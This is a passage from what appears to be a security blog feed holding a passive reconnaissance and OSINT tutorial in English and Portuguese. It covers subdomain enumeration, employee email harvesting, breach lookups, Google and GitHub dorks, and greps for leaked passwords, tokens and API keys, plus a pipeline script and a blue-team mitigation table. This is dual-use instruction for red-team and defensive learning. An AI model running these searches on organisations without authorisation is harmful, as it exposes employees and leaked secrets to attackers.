style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">api</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">_key</span><span style="color:#56B6C2">=</span><span style="color:#98C379">KEY</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">jq</span><span style="color:#ABB2BF"> &#x26;#x27;.data.pattern&#x26;#x27;</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Example output: &#x26;quot;{first}.{last}@target.com&#x26;quot;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Email verification with h8mail</span></span> <span class="line"><span style="color:#61AFEF">pip</span><span style="color:#98C379"> install</span><span style="color:#98C379"> h8mail</span></span> <span class="line"><span style="color:#61AFEF">h8mail</span><span style="color:#D19A66"> -t</span><span style="color:#98C379"> emails.txt</span><span style="color:#D19A66"> --breach-src</span><span style="color:#98C379"> haveibeenpwned</span></span></code></pre> <hr> <h2 id="phase-6--public-code-analysis">Phase 6 — Public Code Analysis</h2> <p>Public repositories often contain accidentally committed credentials, tokens, and internal infrastructure.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># GitHub Dorks — search directly on the site</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># org:target-company password</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># org:target-company secret</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># org:target-company api_key</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># org:target-company internal</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Trufflehog — git history scan</span></span> <span class="line"><span style="color:#61AFEF">pip</span><span style="color:#98C379"> install</span><span style="color:#98C379"> trufflehog</span></span> <span class="line"><span style="color:#61AFEF">trufflehog</span><span style="color:#98C379"> github</span><span style="color:#D19A66"> --org=target-company</span><span style="color:#D19A66"> --only-verified</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># GitLeaks — scan repositories</span></span> <span class="line"><span style="color:#61AFEF">docker</span><span style="color:#98C379"> run</span><span style="color:#D19A66"> -v</span><span style="color:#ABB2BF"> $(</span><span style="color:#56B6C2">pwd</span><span style="color:#ABB2BF">)</span><span style="color:#98C379">:/path</span><span style="color:#98C379"> zricethezav/gitleaks:latest</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#98C379"> detect</span><span style="color:#D19A66"> --source=/path</span><span style="color:#D19A66"> --report-format</span><span style="color:#98C379"> json</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Specific greps in cloned repos</span></span> <span class="line"><span style="color:#61AFEF">git</span><span style="color:#98C379"> clone</span><span style="color:#98C379"> https://github.com/target/public-repo</span></span> <span class="line"><span style="color:#56B6C2">cd</span><span style="color:#98C379"> public-repo</span></span> <span class="line"><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -rE</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;(</span><span style="color:#61AFEF">password</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">passwd</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">secret</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">token</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">api_key</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">aws_access</span><span style="color:#ABB2BF">)&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">.</span></span> <span class="line"><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -rE</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;(</span><span style="color:#61AFEF">https?://[^/]+:[^@]+@</span><span style="color:#ABB2BF">)&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">.</span><span style="color:#7F848E;font-style:italic"> # URLs with credentials</span></span></code></pre> <hr> <h2 id="phase-7--web-technology-analysis">Phase 7 — Web Technology Analysis</h2> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># WhatWeb — passive fingerprinting via history/cache</span></span> <span class="line"><span style="color:#61AFEF">whatweb</span><span style="color:#D19A66"> -a</span><span style="color:#D19A66"> 1</span><span style="color:#98C379"> https://target.com</span><span style="color:#7F848E;font-style:italic"> # stealth mode</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># BuiltWith API</span></span> <span class="line"><span style="color:#61AFEF">curl</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">https://api.builtwith.com/v21/api.json?KEY</span><span style="color:#98C379">=YOUR_KEY</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">LOOKUP</span><span style="color:#ABB2BF">;</span><span style="color:#98C379">=target.com</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">jq</span><span style="color:#ABB2BF"> &#x26;#x27;.Results[].Result.Paths[].Technologies[].Name&#x26;#x27;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Wappalyzer CLI</span></span> <span class="line"><span style="color:#61AFEF">npm</span><span style="color:#98C379"> install</span><span style="color:#D19A66"> -g</span><span style="color:#98C379"> wappalyzer</span></span> <span class="line"><span style="color:#61AFEF">wappalyzer</span><span style="color:#98C379"> https://target.com</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Wayback Machine — old versions of the website</span></span> <span class="line"><span style="color:#61AFEF">curl</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">http://web.archive.org/cdx/search/cdx?url</span><span style="color:#98C379">=*.target.com/*</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">output</span><span style="color:#ABB2BF">;</span><span style="color:#98C379">=text</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">fl</span><span style="color:#ABB2BF">;</span><span style="color:#98C379">=original</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">collapse</span><span style="color:#ABB2BF">;</span><span style="color:#98C379">=urlkey</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">sort</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">head</span><span style="color:#D19A66"> -100</span></span></code></pre> <hr> <h2 id="consolidating-intelligence">Consolidating Intelligence</h2> <p>Organize everything into a structure before moving on to active reconnaissance:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="plaintext"><code><span class="line"><span>target-intel/</span></span> <span class="line"><span>├── domains/</span></span> <span class="line"><span>│ ├── subdomains.txt # all discovered subdomains</span></span> <span class="line"><span>│ ├── dns_records.txt # MX, TXT, NS records</span></span> <span class="line"><span>│ └── whois.txt</span></span> <span class="line"><span>├── ips/</span></span> <span class="line"><span>│ ├── ip_ranges.txt # target CIDRs</span></span> <span class="line"><span>│ └── shodan_results.json</span></span> <span class="line"><span>├── people/</span></span> <span class="line"><span>│ ├── employees.txt # names and positions</span></span> <span class="line"><span>│ ├── emails.txt # collected emails</span></span> <span class="line"><span>│ └── email_format.txt # format standard</span></span> <span class="line"><span>├── tech/</span></span> <span class="line"><span>│ ├── stack.txt # identified technologies</span></span> <span class="line"><span>│ └── certificates.txt # SSL certificates found</span></span> <span class="line"><span>├── credentials/</span></span> <span class="line"><span>│ └── leaked_creds.txt # leaks in breaches</span></span> <span class="line"><span>└── code/</span></span> <span class="line"><span> └── github_findings.txt # findings in public repositories</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/bin/bash</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># passive_recon.sh — Complete passive recon pipeline</span></span> <span class="line"><span style="color:#E06C75">DOMAIN</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75;font-style:italic">${1</span><span style="color:#ABB2BF">:?</span><span style="color:#E06C75">Usage</span><span style="color:#ABB2BF">: </span><span style="color:#E06C75;font-style:italic">$0</span><span style="color:#ABB2BF"> &#x3C;</span><span style="color:#E06C75">domain</span><span style="color:#ABB2BF">></span><span style="color:#E06C75;font-style:italic">}</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#E06C75">OUTPUT</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">./intel/$</span><span style="color:#98C379">{DOMAIN}</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">mkdir</span><span style="color:#D19A66"> -p</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">/</span><span style="color:#98C379">{domains,ips,people,tech}</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[*] Starting passive recon </span><span style="color:#C678DD">for</span><span style="color:#ABB2BF">: ${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Subdomains</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[+] Enumerating subdomains...&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">subfinder</span><span style="color:#D19A66"> -d</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">-all</span><span style="color:#D19A66"> -silent</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#ABB2BF">}/domains/subfinder.txt&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">amass</span><span style="color:#98C379"> enum</span><span style="color:#D19A66"> -passive</span><span style="color:#D19A66"> -d</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#ABB2BF">}/domains/amass.txt&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">cat</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#ABB2BF">}/domains/subfinder.txt&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#ABB2BF">}/domains/amass.txt&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">sort</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#ABB2BF">}/domains/all_subdomains.txt&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">$(wc</span><span style="color:#D19A66"> -l</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">lt</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#ABB2BF">}/domains/all_subdomains.txt&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;) unique subdomains&#x26;quot;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># DNS</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[+] Pulling DNS records...&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">ANY</span><span style="color:#98C379"> +short</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#ABB2BF">}/domains/dns.txt&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">curl</span><span style="color:#D19A66"> -s</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">https://crt.sh/?q</span><span style="color:#98C379">=%</span><span style="color:#56B6C2">.</span><span style="color:#ABB2BF">${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">output</span><span style="color:#ABB2BF">;</span><span style="color:#98C379">=json</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">jq</span><span style="color:#D19A66"> -r</span><span style="color:#ABB2BF"> &#x26;#x27;.[].name_value&#x26;#x27; | sort -u &#x26;gt;&#x26;gt; &#x26;quot;${OUTPUT}/domains/all_subdomains.txt&#x26;quot;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Emails</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[+] Harvesting emails...&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#61AFEF">python3</span><span style="color:#98C379"> theHarvester.py</span><span style="color:#D19A66"> -d</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">-b</span><span style="color:#98C379"> google,hunter</span><span style="color:#D19A66"> -l</span><span style="color:#D19A66"> 200</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -E</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">@$</span><span style="color:#98C379">{DOMAIN}</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; | </span><span style="color:#61AFEF">sort</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#ABB2BF">}/people/emails.txt&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[✓] Recon complete. Output: ${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span></code></pre> <hr> <h2 id="mitigations-blue-team">Mitigations (Blue Team)</h2> <table><thead><tr><th>Vector</th><th>Mitigation</th></tr></thead><tbody><tr><td>Google Dorks</td><td>Google Search Console — remove sensitive URLs from the index</td></tr><tr><td>WHOIS</td><td>Use domain privacy (WHOIS Privacy)</td></tr><tr><td>Certificate Transparency</td><td>Unavoidable — use generic subdomains</td></tr><tr><td>Shodan</td><td>Firewalls with no-scan rules; <code>X-Robots-Tag: noindex</code></td></tr><tr><td>GitHub leaks</td><td>Pre-commit hooks + active secret scanning</td></tr><tr><td>LinkedIn OSINT</td><td>Limit technology information in public profiles</td></tr></tbody></table> <p>> <strong>Legal note:</strong> These techniques should be used exclusively in authorized engagements or for educational purposes. Unauthorized use is illegal.</p>redteam@kbmsecurity.com.brreconosintreconpassiveshodantheHarvesteramassgoogle-dorkseasyPassive Recon & OSINT — Mapeando o Alvo Sem Fazer Ruídohttps://www.kbmsecurity.com.br/blog/post/passive-recon-osint/https://www.kbmsecurity.com.br/blog/post/passive-recon-osint/Técnicas de reconhecimento passivo e OSINT para mapear infraestrutura, funcionários e superfície de ataque antes de qualquer engajamento ativo.Tue, 07 Jan 2025 00:00:00 GMT<h2 id="o-que-é-reconhecimento-passivo">O que é Reconhecimento Passivo?</h2> <p>Reconhecimento passivo é a fase de coleta de inteligência onde o operador <strong>nunca interage diretamente</strong> com a infraestrutura do alvo. Toda informação é obtida através de fontes abertas (OSINT — Open Source Intelligence) ou intermediários públicos.</p> <p>A vantagem crítica: <strong>zero logs no alvo</strong>. Nenhum IDS, WAF ou SIEM do cliente verá sua atividade.</p> <blockquote> <p><strong>Regra de ouro:</strong> quanto mais você sabe antes de tocar a rede, menor sua superfície de exposição durante o engajamento ativo.</p> </blockquote> <hr> <h2 id="fase-1--footprinting-de-domínio">Fase 1 — Footprinting de Domínio</h2> <h3 id="whois-e-registros-dns">WHOIS e Registros DNS</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Informações de registro do domínio</span></span> <span class="line"><span style="color:#61AFEF">whois</span><span style="color:#98C379"> target.com</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Consultas DNS fundamentais</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> target.com</span><span style="color:#98C379"> ANY</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> target.com</span><span style="color:#98C379"> MX</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> target.com</span><span style="color:#98C379"> NS</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> target.com</span><span style="color:#98C379"> TXT</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Zone transfer (frequentemente bloqueado, mas vale tentar)</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> axfr</span><span style="color:#98C379"> @ns1.target.com</span><span style="color:#98C379"> target.com</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Subdomínios via certificate transparency</span></span> <span class="line"><span style="color:#61AFEF">curl</span><span style="color:#D19A66"> -s</span><span style="color:#98C379"> "https://crt.sh/?q=%.target.com&#x26;output=json"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">jq</span><span style="color:#D19A66"> -r</span><span style="color:#98C379"> '.[].name_value'</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">sort</span><span style="color:#D19A66"> -u</span></span></code></pre> <h3 id="amass--enumeração-de-subdomínios">Amass — Enumeração de Subdomínios</h3> <p><a href="https://github.com/owasp-amass/amass">Amass</a> é a ferramenta de referência para enumeração passiva de subdomínios. Agrega dezenas de fontes públicas.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Instalação</span></span> <span class="line"><span style="color:#61AFEF">go</span><span style="color:#98C379"> install</span><span style="color:#D19A66"> -v</span><span style="color:#98C379"> github.com/owasp-amass/amass/v4/...@master</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Enumeração passiva pura (sem brute-force)</span></span> <span class="line"><span style="color:#61AFEF">amass</span><span style="color:#98C379"> enum</span><span style="color:#D19A66"> -passive</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#D19A66"> -o</span><span style="color:#98C379"> amass_output.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Com todas as fontes de dados (requer API keys)</span></span> <span class="line"><span style="color:#61AFEF">amass</span><span style="color:#98C379"> enum</span><span style="color:#D19A66"> -passive</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -config</span><span style="color:#98C379"> ~/.config/amass/config.ini</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -o</span><span style="color:#98C379"> subdomains.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Visualização do grafo de ativos</span></span> <span class="line"><span style="color:#61AFEF">amass</span><span style="color:#98C379"> viz</span><span style="color:#D19A66"> -d3</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#D19A66"> -o</span><span style="color:#98C379"> graph.html</span></span></code></pre> <h3 id="subfinder--rápido-e-silencioso">Subfinder — Rápido e Silencioso</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Instalação</span></span> <span class="line"><span style="color:#61AFEF">go</span><span style="color:#98C379"> install</span><span style="color:#D19A66"> -v</span><span style="color:#98C379"> github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Enumeração passiva</span></span> <span class="line"><span style="color:#61AFEF">subfinder</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#D19A66"> -all</span><span style="color:#D19A66"> -recursive</span><span style="color:#D19A66"> -o</span><span style="color:#98C379"> subfinder_out.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Com resolução automática</span></span> <span class="line"><span style="color:#61AFEF">subfinder</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#D19A66"> -all</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">dnsx</span><span style="color:#D19A66"> -silent</span></span></code></pre> <hr> <h2 id="fase-2--google-dorks">Fase 2 — Google Dorks</h2> <p>Google Dorks são operadores de busca avançados que revelam informações sensíveis indexadas acidentalmente.</p> <h3 id="dorks-essenciais">Dorks Essenciais</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Subdomínios e hosts relacionados</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Excluindo o domínio principal (revela subdomínios)</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#D19A66"> -www</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Arquivos sensíveis expostos</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> filetype:pdf</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> filetype:xls</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> filetype:xlsx</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> filetype:sql</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> filetype:env</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> filetype:log</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Painéis de administração</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> inurl:admin</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> inurl:login</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> inurl:dashboard</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> intitle:"index of"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Credenciais e configs vazadas</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> intext:"password"</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> ext:conf</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> ext:config</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> ext:cfg</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> ext:bak</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> ext:backup</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> ext:old</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Tecnologia exposta</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> intext:"powered by"</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> intext:"phpMyAdmin"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Endpoints de API</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> inurl:/api/</span></span> <span class="line"><span style="color:#61AFEF">site:target.com</span><span style="color:#98C379"> inurl:/v1/</span><span style="color:#98C379"> OR</span><span style="color:#98C379"> inurl:/v2/</span></span></code></pre> <h3 id="automatizando-com-gowitness">Automatizando com gowitness</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Screenshot de todos os subdomínios encontrados</span></span> <span class="line"><span style="color:#61AFEF">cat</span><span style="color:#98C379"> subdomains.txt</span><span style="color:#ABB2BF"> | </span><span 